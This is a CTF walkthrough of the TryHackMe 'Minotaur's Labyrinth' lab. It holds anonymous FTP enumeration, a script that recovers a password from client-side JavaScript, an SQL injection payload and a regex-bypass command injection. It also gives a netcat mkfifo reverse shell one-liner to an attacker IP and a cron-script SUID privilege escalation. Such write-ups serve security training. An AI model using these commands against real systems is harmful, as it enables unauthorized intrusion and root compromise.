TryHackMe-Minotaur’s Labyrinth

Hello everyone , I hope you are doing well , in this post I will be sharing my walk through for THM Minotaur room , it was rated medium difficulty room but it felt like as it was easy room but anyways the machine had 3 ports open , FTP, HTTP(s) and Mysql. On FTP we can see that anonymous login enabled so we can access directories , but we don’t find much other than a flag and user names. On http we can see a login page but we don’t have any credentials , so looking into javascript file we can see a function which is generating a password so we can use that to get the password and login to access dashboard , we can then find a search field for either Persons or Creatures , this field was vulnerable to sqli and we can find admin’s credentials and access a secret page from which we can perform remote code execution and in root’s directory we can see timer.sh , which was writable by anyone and that scripts is ran automatically every minute and we can make bash a SUID to become root.

NMAP

21/tcp   open  ftp      syn-ack ttl 63 ProFTPD                    
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 nobody nogroup 4096 Jun 15 14:57 pub
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: C4AF3528B196E5954B638C13DDC75F2F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1
| http-title: Login
|_Requested resource was login.html
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.48 ((Unix) OpenSSL/1.1.1k PHP/8.0.7 mod_perl/2.0.11 Perl/v5.32.1)
|_http-favicon: Unknown favicon MD5: BE43D692E85622C2A4B2B588A8F8E2A6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| NULL:
|_ Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host 'ip-10-8-94-60.eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint

PORT 21 (FTP)

Since anonymous login is enabled , we can login to ftp without the need of password

We can see a directory named pub and in that folder we'll see another hidden folder and a text file

From .secret we'll get two more text files

The message that those two files give us is

PORT 80 (HTTP)

On the webserver we can find a login page

If we check the source , we can find login.js

Looking into the java script file , we can see there are three arrays , a,b and c and the indexes of these 3 arrays are being combined to generate a password , so we need to just copy that part of the function and just print the concatenated value of string also to note that this is a password for Daedalus

a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
print (a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8])

After submitting those credentials onto the login page we’ll be granted access to the dashboard

If we scroll down a little , we can see that there are two options , either we search for people name from People table or we search for creature name from Creatures table , so let's run burp suite on this page and try some sqli

If we search the name “Daedalus” it will return us this user’s id and password

So let’s try a sqli 'or 1=1 --

And this gave us all the results from Person’s table, we can also check how many number of columns does this table have so we can also enumerate which version of mysql it's using.

If we try to arrange the records by 4th column it’s going to give us an error meaning that there are only 3 columns in the table

We can crack the users password from crack station website

On logging in with M!n0taur user we can see another tab in navigation bar

Foothold

On this page we can echo text but if we try to break out of the command to run bash commands we can’t as it’s using this regex (saw from the hint)

/[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/

This regex doesn’t include | so we can echo id and pipe it's reuslt to bash

We can check if there’s netcat (nc) available on this machine

To get a reverse shell , we need to base64 encode the netcat shell because there will be special characters in the payload so first we’ll convert it to base64

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.94.60 2222 >/tmp/f

And we’ll send it by piping it to base64 deocde and then to bash

Stabilizing the shell

We can check the echo.php file just to understand what was happening in the background

Also we can find database credentials from dbconnect.php

In user directory we can get our user flag

Privilege Escalation (root)

We can find a directory named timer in root directory /

#!/bin/bash                                                               
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt

We know that everyone can read ,write and execute this bash script , so we can try to add id and save the result in a file ,and if we wait for the bash script to be executed we'll see the result of this command

Now what we can do is , make bash a SUID so when we execute bash it will be executed as root user and we will get shell as root user

Pentester | CTF Player